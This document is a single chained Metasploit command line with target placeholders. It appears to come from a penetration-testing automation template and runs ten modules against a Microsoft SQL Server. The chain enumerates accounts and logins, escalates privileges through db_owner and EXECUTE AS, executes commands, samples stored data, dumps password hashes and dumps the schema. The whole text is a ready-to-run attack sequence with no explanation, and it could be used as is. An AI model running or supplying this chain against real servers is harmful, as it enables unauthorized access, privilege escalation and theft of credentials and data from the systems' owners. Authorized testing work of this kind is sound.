Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'
